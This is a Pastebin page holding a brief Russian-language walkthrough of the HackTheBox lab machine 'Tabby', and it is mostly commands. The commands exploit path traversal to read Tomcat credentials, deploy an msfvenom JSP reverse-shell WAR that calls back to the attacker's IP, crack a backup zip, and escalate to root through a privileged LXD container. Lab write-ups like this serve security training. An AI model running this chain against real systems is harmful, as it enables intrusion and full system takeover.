API tools faq
paste
Advertisement
askanton

HackTheBox Tabby

askanton
Nov 19th, 2020 (edited)
1,381
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.75 KB | None | 0 0
raw download clone embed print report
  1. Manual https://youtu.be/gEPRyt6hWk8
  2.  
  3.  
  4. Проверяем результат nikto на станадртные пароли
  5.  
  6. Переходим на 10.10.10.194 и смотрим сорс
  7.  
  8. Добавляем 10.10.10.194 megahosting.htb в файл /etc/hosts
  9.  
  10. Эксплуатируем LFI ../../../../../usr/share/tomcat9/tomcat-users.xml
  11.  
  12. пароль $3cureP4s5w0rd123!
  13.  
  14. ash
  15.  
  16. Находим пароль и смотрим на его привелегии
  17.  
  18. Смотрим свой адрес ifconfig
  19.  
  20. Генирируем war file msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.111 LPORT=53 -f war > tabby_wf.war
  21.  
  22. Заливаем файл curl -u "tomcat:\$3cureP4s5w0rd123!" --upload-file tabby_wf.war http://10.10.10.194:8080/manager/text/deploy?path=/tabby_wf
  23.  
  24. запускаем прослушку sudo nc -nlvp 53
  25.  
  26. Запускаем нашу консоль curl http://10.10.10.194:8080/tabby_wf/
  27.  
  28. Меняем косколь на пайтоновскую python3 -c 'import pty; pty.spawn("/bin/bash")'
  29.  
  30. Передаем в нее сочитания клавиш stty raw -echo
  31.  
  32. Даем возмоногсть очистки терминала export TERM=xterm
  33.  
  34. Просматриваем содержимое и находим бекап
  35.  
  36. Пробуем распаковать /var/www/html/files$ unzip 16162020_backup.zip
  37.  
  38. Поднимаем сервер на удаленной машине python3 -m http.server 5555
  39.  
  40.  
  41. Скачиваем архив себе на машину wget http://10.10.10.194:5555/16162020_backup.zip
  42.  
  43. Крякаем ~/Desktop/htb/tabby/user$ fcrackzip -D -p /usr/share/wordlists/rockyou.txt 16162020_backup.zip
  44.  
  45. Просматриваем содержимое
  46.  
  47. Пробуем пароль для пользователя ash
  48.  
  49. забираем код пользователя
  50.  
  51. Смотрим какие группі пользователей в наличии id
  52.  
  53. Качаем альпину на свою машину git clone https://github.com/saghul/lxd-alpine-builder
  54. cd lxd-alpine-builder/
  55. билдим sudo bash build-alpine
  56.  
  57. Поднимаем у себя сервер python -m SimpleHTTPServer 8887
  58.  
  59.  
  60. Качаем образ с машины HTB wget http://10.10.14.111:8887/alpine-v3.12-x86_64-20200826_2058.tar.gz
  61.  
  62. импортируем его lxc image import ./alpine-v3.12-x86_64-20201119_0854.tar.gz --alias lazyit77
  63.  
  64. Запускаем lxc init lazy_it_lxc video21-container -c security.privileged=true
  65.  
  66. Маунтим директории lxc config device add video21-container video21-device disk source=/ path=/mnt/root recursive=true
  67.  
  68. Запускаем lxc start video21-container
  69.  
  70. lxc exec video21-container /bin/sh
  71.  
  72. Переходим к руту cd /mnt/root
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!